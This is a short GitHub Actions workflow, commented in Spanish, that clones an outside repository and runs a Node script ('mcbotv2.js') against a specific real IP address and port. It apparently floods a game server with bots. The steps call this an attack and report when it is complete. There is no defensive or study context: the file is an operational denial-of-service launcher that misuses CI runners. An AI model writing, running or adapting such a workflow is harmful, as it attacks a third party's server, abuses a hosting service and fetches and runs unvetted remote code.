name: Ata1a
on:
  workflow_dispatch:

jobs:
  anak:
    runs-on: ubuntu-latest
    timeout-minutes: 1
    
    steps:
      - name: Clonar repositorio
        run: |
          git clone https://github.com/ricardocraft121-gif/ssh2.git
          
      - name: Entrar y ejecutar ataque
        run: |
          cd ssh2
          timeout 25 node mcbotv2.js 209.192.185.15 25648 44444 15 "hawaiana|Hoaolsozozososkksksksk" 4
          
      - name: Limpiar
        if: always()
        run: |
          echo "✅ Ataque completado después de 20 segundos"
          sleep 2
